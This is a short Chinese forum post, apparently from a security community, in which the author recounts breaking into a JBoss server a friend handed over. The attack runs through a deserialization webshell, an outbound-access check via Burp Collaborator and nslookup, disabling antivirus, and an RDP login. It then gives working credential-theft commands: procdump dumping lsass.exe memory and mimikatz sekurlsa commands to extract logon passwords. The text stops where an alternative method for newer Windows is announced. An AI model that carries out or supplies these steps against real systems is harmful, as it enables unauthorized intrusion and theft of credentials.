朋友给了我一个jboss的站,让我看看,用反序列化直接拿下webshell,就不多说了


简单的看看能不能出网。

点击burp的collaborator client 然后点击copy to clipboard。
然后在cmd输入nslookup 你复制的内容,最最后看burp有没有回显。我这里是能出网的。
简单的关掉杀软想用cs上线。这里就不贴图了。但是却发现上不了线。只好简单粗暴的连3389


端口没有改,OK,先抓密码,
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp
sekurlsa::minidump lsass.dmp
log
sekurlsa::logonpasswords
当然这里提一句,这里的服务器为windows2012.如果遇见win2016这种新的,可能连hash都解不出来。我们可以用一下方法。

点击收藏 | 0 关注 | 2
登录 后跟帖